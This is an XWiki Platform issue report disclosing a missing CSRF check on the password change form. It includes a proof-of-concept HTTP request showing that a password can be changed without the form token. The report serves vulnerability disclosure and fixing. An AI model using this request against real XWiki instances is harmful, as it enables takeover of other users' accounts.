Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-18315

No CSRF protection on the password change form

    XMLWordPrintable

Details

    • Easy
    • N/A
    • N/A

    Description

      There is no protection against CSRF type attacks on the password change form. The form_token parameter is not checked on the server side. It is possible to create a request without this parameter, and the password will be changed.

      It is therefore very easy, under the condition of tricking an administrator, to be able to change the password of any user of the Wiki.

      Here is an example of a query that allows you to change a password (user toto) on the current stable version of XWiki (POST and GET methods are possible):

       

      GET /xwiki/bin/view/XWiki/toto?xpage=passwd&xwikipassword=aaaaaaaa&xwikipassword2=aaaaaaaa HTTP/1.1
      Host: 127.0.0.1:8080
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
      Accept-Language: en-GB,en;q=0.5
      Accept-Encoding: gzip, deflate
      Origin: http://127.0.0.1:8080
      Connection: close
      Referer: http://127.0.0.1:8080/xwiki/bin/view/XWiki/toto?xpage=passwd
      Cookie: JSESSIONID=1AC1B58E461B85FBE5E1C980197C5A64; username="XXX"; password="XXX"; rememberme="false"; validation="XXX"

       

      Attachments

        Issue Links

          links to

          Web Link Github security advisory

          Activity

            People

              surli Simon Urli
              Ventresca Pierrick Vuillemin
              Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: